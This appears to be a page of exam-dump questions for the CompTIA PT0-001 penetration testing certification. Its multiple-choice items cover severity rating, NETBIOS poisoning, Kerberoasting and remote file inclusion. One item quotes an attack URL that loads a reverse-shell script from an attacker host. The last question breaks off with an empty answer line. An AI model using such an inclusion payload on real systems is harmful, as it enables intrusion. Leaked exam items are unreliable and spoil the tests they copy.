Free CompTIA PT0-001 Exam Dumps Questions & Answers

A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

• A.The client has updated their codebase with new features.
• B.The client has applied a hot fix without updating the version.
• C.The threat landscape has significantly changed.
• D.Thera are currently no known exploits for this vulnerability.

A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?

• A.responder
• B.arPspoof
• C.nmap
• D.burpsuite

A penetration tester runs a script that queries the domain controller for user service principal names. Which of the following techniques is MOST likely being attempted?

• A.Kerberoasting
• B.Cleartext credentials in LDAP
• C.Cpassword
• D.LSASS credential extraction

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?

• A.Double URL encode the parameters.
• B.Block URL redirections.
• C.Stop external calls from the application.
• D.Implement a blacklist.

Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once

Correct Answer: